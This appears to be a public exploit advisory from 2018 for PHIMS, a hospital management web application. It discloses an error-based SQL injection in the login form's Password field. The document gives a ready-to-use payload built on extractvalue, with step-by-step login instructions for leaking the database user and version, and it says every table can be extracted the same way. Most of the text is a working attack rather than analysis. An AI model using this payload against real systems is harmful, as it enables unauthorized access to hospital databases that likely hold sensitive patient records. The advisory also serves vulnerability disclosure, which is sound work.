# Exploit Title:PHIMS - Hospital Management Information System - 'Password' SQL Injection# Dork: N/A# Date: 2018-02-16# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com# Vendor Homepage: https://codecanyon.net/item/phims/14974225?s_rank=1566# Version: All version# Category: Webapps# CVE: N/A# # # # ## Description:# The vulnerability allows an attacker to inject sql commands.# # # # ## Proof of Concept :
SQLI :# Parameter : Password (POST)#Type: Error based#Title:MariaDB >= 10.2.11 AND Error based - extractvalue (XPATH query)#Payload : 1" and extractvalue(1,concat(0x3a,user(),0x3a,version()))######################################### Discrption : The 'password' field is vulnerable in this script('Password' parameter).First inject payload into this parameter.# then put anything in username (like:anything@anything.anything) and click
login. You will have XPATH syntax
error in the next page that contains user and db_name .# You can find all tables and any information from database by using XPATH
query .
Username : anything@anything.anything
Password :1" and extractvalue(1,concat(0x3a,user(),0x3a,version()))#